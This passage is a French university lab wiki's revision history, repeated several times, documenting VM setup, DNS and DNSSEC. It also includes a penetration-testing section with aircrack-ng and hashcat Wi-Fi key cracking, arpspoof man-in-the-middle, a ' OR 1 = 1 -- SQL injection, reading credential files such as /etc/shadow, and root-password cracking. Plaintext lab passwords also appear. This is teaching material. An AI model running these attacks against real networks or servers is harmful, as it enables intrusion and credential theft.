ophiocordyceps ansible_host=192.168.42.2</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55137TP sysres IMA5sc 2020/2021 G92020-12-21T17:43:42Z<p>Pvernier : /* Sécurisation de données */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
===Sécurisation de site web par certificat===<br />
<br />
La première étape est de générer un certificat à l'aide de la commande suivante :<br />
<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout calicedelamort.site.key -out calicedelamort.site.csr<br />
<br />
Ensuite, on se rend sur gandi.net, et nous ajoutons le certificat généré à notre domaine calicedelamort.site. Ensuite, nous attendons d'obtenir le certificat signé sur le serveur de mail que nous avons installé sur notre VM.<br />
<br />
===Sécurisation de serveur DNS par DNSSEC===<br />
<br />
En premier lieu, nous devons activer le protocole DNSSEC dans le fichier de configuration de bind : /etc/bind/named.conf.local<br />
<br />
dnssec-enable yes<br />
<br />
Ensuite, nous créons un dossier calicedelamort.site.dnssec/ puis nous y générons les clefs ZSK et KSK à l'aide des commandes suivantes :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE calicedelamort.site<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE calicedelamort.site<br />
<br />
Puis, nous allons dans le fichier de configuration de notre site : /etc/bind/db.calicedelamort.site, et nous y ajoutons les deux lignes suivantes :<br />
<br />
$include /etc/bind/calicedelamort.site.dnssec/calicedelamort.site-ksk.key<br />
$include /etc/bind/calicedelamort.site.dnssec/calicedelamort.site-zsk.key<br />
<br />
Enfin, nous signons le tout à l'aide de la commande :<br />
<br />
dnssec-signzone -o calicedelamort.site -k calicedelamort.site-ksk ../db.calicedelamort.site calicedelamort.site-zsk <br />
<br />
Dans le fichier /etc/bind/named.conf.local, nous modifions la zone pour y mettre le fichier signé :<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site.signed";<br />
allow-transfer{217.70.177.40;};<br />
};<br />
<br />
Pour finir, nous relançons bind9 :<br />
<br />
service bind9 restart<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
[[Fichier:Crack_resultat_WPA.PNG|center]]<br />
<br />
Il est aussi possible de cracker la clef avec hashcat. Cela permet de d'utiliser la puissance du GPU pour brute force la clef. Grace à ma super carte graphique la 2080 super, nous avons pu diviser par 100 le temps du brute force.<br />
<br />
La commande est la suivante:<br />
crunch 8 8 0123456789 | hashcat -m 2500 output.hccapx<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
[[Fichier:Wiresharck.jpg|center|400px]]<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
<br />
Pour cette partie, on se rend sur le lien http://honey.plil.info.<br />
Nous y trouvons une page de connexion demandant un login et un password.<br />
<br />
N'ayant pas de compte sur ce site, on essaye une simple injection SQL :<br />
Dans les champs 'login' et 'password' on écrit l'injection SQL suivante : " ' OR 1 = 1 -- "<br />
Ca fonctionne ! Nous avons accès aux informations de connexion des utilisateurs<br />
<br />
<br />
Grâce aux informations trouvées à l'aide de l'injection SQL nous pouvons nous connecter en tant qu'administrateur.<br />
En explorant un peu le site, nous trouvons une fonctionnalité qui permet d'importer des fichiers sur la page web et de les télécharger.<br />
<br />
[[Fichier:Ajoutmanuel.png|center]]<br />
<br />
<br />
En parallèle de cela, à l'aide de la commande<br />
dirb http://honey.plil.info/<br />
On trouve une page phpmyadmin : http://honey.plil.info/phpmyadmin<br />
<br />
[[Fichier:phpmyadmin.png|center]]<br />
<br />
Encore une page de connexion, il faut donc trouver le login et le password permettant de se connecter à cette page. Cette fois, les injections SQL ne fonctionne pas.<br />
<br />
Cependant, nous avons vu plus tôt que nous pouvions importer et télécharger des fichiers depuis la page web précédente, et en effectuant quelques tests, nous nous sommes rendu compte que ces fichiers provenaient du serveur qui hébergeait le site web.<br />
<br />
En regardant sur internet, nous avons trouvé que le fichier contenant les logins et mot de passes de connexion à la page phpmyadmin se trouvaient dans /etc/phpmyadmin/config-db.php<br />
<br />
Nous uploadons et téléchargeons ce fichier depuis la page web :<br />
<br />
[[Fichier:Config_dbphp.png|center]]<br />
<br />
Nous avons maintenant accès à la page de gestion de la base de données du serveur.<br />
<br />
<br />
Maintenant que l'on sait que l'on peut télécharger des fichiers depuis le serveur, on décide de télécharger le fichier /etc/passwd :<br />
<br />
[[Fichier:Passwd.PNG|center]]<br />
<br />
<br />
On trouve l'utilisateur 'rex' sur lequel on pourrait tenter de se connecter en ssh. Nous essayons, cependant, il nous faut le mot de passe de cet utilisateur. Explorons donc phpmyadmin en s'y connectant en tant que root.<br />
<br />
En cherchant bien, on trouve un fichiers 'users' (dans la structure 'test') dans lequel apparait le mot de passe de l'utilisateur 'rex' en clair.<br />
<br />
On se connecte donc en ssh sur cet utilisateur.<br />
ssh rex@honey.plil.info<br />
<br />
La dernière étape est donc de récupérer le mot de passe root du serveur. Or, on sait que celui-ci se trouve dans le fichier /etc/shadow , fichier qui est, bien entendu, accessible depuis l'utilisateur 'rex'.<br />
<br />
Une fois ce fichier récupéré, il ne nous reste plus qu'à brute force le mot de passe root.<br />
<br />
On utilise le programme 'John The Ripper', cependant, il nous faut un dictionnaire pour aider John The Riper.<br />
On sait que le mot de passe root à la même particularité que les mots de passes des machines de TPs. On crée donc un dictionnaire en fonction de cette information à l'aide de la commande 'crunch'.<br />
<br />
On peut finalement lancer John The Riper avec le dictionnaire, on trouve le mot de passe, et on peut enfin se connecter en tant qu'utilisateur root sur le serveur.<br />
<br />
==Réalisation==<br />
<br />
===Sécurisation de données===<br />
Nous avons dans un premier temps créé 3 partitions virtuelles:<br />
<br />
lvcreate -L1G -n calicedelamort-raid1 storage<br />
lvcreate -L1G -n calicedelamort-raid2 storage<br />
lvcreate -L1G -n calicedelamort-raid3 storage<br />
<br />
Ensuite, nous les avons ajoutées dans notre fichier: /etc/xen/Calicedelamort.cfg<br />
<br />
disk = [<br />
'file:/usr/local/xen/domains/Calicedelamort/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Calicedelamort/swap.img,xvda1,w',<br />
'phy:/dev/storage/PaulTanguy1,xvda3,w',<br />
'phy:/dev/storage/PaulTanguy2,xvda4,w',<br />
'phy:/dev/storage/calicedelamort-raid1,xvda5,w',<br />
'phy:/dev/storage/calicedelamort-raid2,xvda6,w',<br />
'phy:/dev/storage/calicedelamort-raid3,xvda7,w',<br />
]<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)<br />
<br />
On crée ensuite un inventaire : /etc/ansible/hosts<br />
<br />
[Me_Chassiron]<br />
calicedelamort ansible_host=192.168.42.9<br />
[All_Chassiron]<br />
calicedelamort ansible_host=192.168.42.9<br />
truffe ansible_host=192.168.42.12<br />
girolle ansible_host=192.168.42.7<br />
amanite ansible_host=192.168.42.5<br />
tricholome ansible_host=192.168.42.4<br />
ophiocordyceps ansible_host=192.168.42.2</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55136TP sysres IMA5sc 2020/2021 G92020-12-21T17:43:32Z<p>Pvernier : /* Sécurisation de données */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
===Sécurisation de site web par certificat===<br />
<br />
La première étape est de générer un certificat à l'aide de la commande suivante :<br />
<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout calicedelamort.site.key -out calicedelamort.site.csr<br />
<br />
Ensuite, on se rend sur gandi.net, et nous ajoutons le certificat généré à notre domaine calicedelamort.site. Ensuite, nous attendons d'obtenir le certificat signé sur le serveur de mail que nous avons installé sur notre VM.<br />
<br />
===Sécurisation de serveur DNS par DNSSEC===<br />
<br />
En premier lieu, nous devons activer le protocole DNSSEC dans le fichier de configuration de bind : /etc/bind/named.conf.local<br />
<br />
dnssec-enable yes<br />
<br />
Ensuite, nous créons un dossier calicedelamort.site.dnssec/ puis nous y générons les clefs ZSK et KSK à l'aide des commandes suivantes :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE calicedelamort.site<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE calicedelamort.site<br />
<br />
Puis, nous allons dans le fichier de configuration de notre site : /etc/bind/db.calicedelamort.site, et nous y ajoutons les deux lignes suivantes :<br />
<br />
$include /etc/bind/calicedelamort.site.dnssec/calicedelamort.site-ksk.key<br />
$include /etc/bind/calicedelamort.site.dnssec/calicedelamort.site-zsk.key<br />
<br />
Enfin, nous signons le tout à l'aide de la commande :<br />
<br />
dnssec-signzone -o calicedelamort.site -k calicedelamort.site-ksk ../db.calicedelamort.site calicedelamort.site-zsk <br />
<br />
Dans le fichier /etc/bind/named.conf.local, nous modifions la zone pour y mettre le fichier signé :<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site.signed";<br />
allow-transfer{217.70.177.40;};<br />
};<br />
<br />
Pour finir, nous relançons bind9 :<br />
<br />
service bind9 restart<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
[[Fichier:Crack_resultat_WPA.PNG|center]]<br />
<br />
Il est aussi possible de cracker la clef avec hashcat. Cela permet de d'utiliser la puissance du GPU pour brute force la clef. Grace à ma super carte graphique la 2080 super, nous avons pu diviser par 100 le temps du brute force.<br />
<br />
La commande est la suivante:<br />
crunch 8 8 0123456789 | hashcat -m 2500 output.hccapx<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
[[Fichier:Wiresharck.jpg|center|400px]]<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
<br />
Pour cette partie, on se rend sur le lien http://honey.plil.info.<br />
Nous y trouvons une page de connexion demandant un login et un password.<br />
<br />
N'ayant pas de compte sur ce site, on essaye une simple injection SQL :<br />
Dans les champs 'login' et 'password' on écrit l'injection SQL suivante : " ' OR 1 = 1 -- "<br />
Ca fonctionne ! Nous avons accès aux informations de connexion des utilisateurs<br />
<br />
<br />
Grâce aux informations trouvées à l'aide de l'injection SQL nous pouvons nous connecter en tant qu'administrateur.<br />
En explorant un peu le site, nous trouvons une fonctionnalité qui permet d'importer des fichiers sur la page web et de les télécharger.<br />
<br />
[[Fichier:Ajoutmanuel.png|center]]<br />
<br />
<br />
En parallèle de cela, à l'aide de la commande<br />
dirb http://honey.plil.info/<br />
On trouve une page phpmyadmin : http://honey.plil.info/phpmyadmin<br />
<br />
[[Fichier:phpmyadmin.png|center]]<br />
<br />
Encore une page de connexion, il faut donc trouver le login et le password permettant de se connecter à cette page. Cette fois, les injections SQL ne fonctionne pas.<br />
<br />
Cependant, nous avons vu plus tôt que nous pouvions importer et télécharger des fichiers depuis la page web précédente, et en effectuant quelques tests, nous nous sommes rendu compte que ces fichiers provenaient du serveur qui hébergeait le site web.<br />
<br />
En regardant sur internet, nous avons trouvé que le fichier contenant les logins et mot de passes de connexion à la page phpmyadmin se trouvaient dans /etc/phpmyadmin/config-db.php<br />
<br />
Nous uploadons et téléchargeons ce fichier depuis la page web :<br />
<br />
[[Fichier:Config_dbphp.png|center]]<br />
<br />
Nous avons maintenant accès à la page de gestion de la base de données du serveur.<br />
<br />
<br />
Maintenant que l'on sait que l'on peut télécharger des fichiers depuis le serveur, on décide de télécharger le fichier /etc/passwd :<br />
<br />
[[Fichier:Passwd.PNG|center]]<br />
<br />
<br />
On trouve l'utilisateur 'rex' sur lequel on pourrait tenter de se connecter en ssh. Nous essayons, cependant, il nous faut le mot de passe de cet utilisateur. Explorons donc phpmyadmin en s'y connectant en tant que root.<br />
<br />
En cherchant bien, on trouve un fichiers 'users' (dans la structure 'test') dans lequel apparait le mot de passe de l'utilisateur 'rex' en clair.<br />
<br />
On se connecte donc en ssh sur cet utilisateur.<br />
ssh rex@honey.plil.info<br />
<br />
La dernière étape est donc de récupérer le mot de passe root du serveur. Or, on sait que celui-ci se trouve dans le fichier /etc/shadow , fichier qui est, bien entendu, accessible depuis l'utilisateur 'rex'.<br />
<br />
Une fois ce fichier récupéré, il ne nous reste plus qu'à brute force le mot de passe root.<br />
<br />
On utilise le programme 'John The Ripper', cependant, il nous faut un dictionnaire pour aider John The Riper.<br />
On sait que le mot de passe root à la même particularité que les mots de passes des machines de TPs. On crée donc un dictionnaire en fonction de cette information à l'aide de la commande 'crunch'.<br />
<br />
On peut finalement lancer John The Riper avec le dictionnaire, on trouve le mot de passe, et on peut enfin se connecter en tant qu'utilisateur root sur le serveur.<br />
<br />
==Réalisation==<br />
<br />
===Sécurisation de données===<br />
Nous avons dans un premier temps créé 3 partitions virtuelles:<br />
<br />
lvcreate -L1G -n calicedelamort-raid1 storage<br />
lvcreate -L1G -n calicedelamort-raid2 storage<br />
lvcreate -L1G -n calicedelamort-raid3 storage<br />
<br />
Ensuite, nous les avons ajoutées dans notre fichier: /etc/xen/Calicedelamort.cfg<br />
<br />
disk = [<br />
'file:/usr/local/xen/domains/Calicedelamort/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Calicedelamort/swap.img,xvda1,w',<br />
'phy:/dev/storage/PaulTanguy1,xvda3,w',<br />
'phy:/dev/storage/PaulTanguy2,xvda4,w',<br />
'phy:/dev/storage/calicedelamort-raid1,xvda5,w',<br />
'phy:/dev/storage/calicedelamort-raid2,xvda6,w',<br />
'phy:/dev/storage/calicedelamort-raid3,xvda7,w',<br />
<br />
]<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)<br />
<br />
On crée ensuite un inventaire : /etc/ansible/hosts<br />
<br />
[Me_Chassiron]<br />
calicedelamort ansible_host=192.168.42.9<br />
[All_Chassiron]<br />
calicedelamort ansible_host=192.168.42.9<br />
truffe ansible_host=192.168.42.12<br />
girolle ansible_host=192.168.42.7<br />
amanite ansible_host=192.168.42.5<br />
tricholome ansible_host=192.168.42.4<br />
ophiocordyceps ansible_host=192.168.42.2</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55135TP sysres IMA5sc 2020/2021 G92020-12-21T17:41:52Z<p>Pvernier : /* Sécurisation de données */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
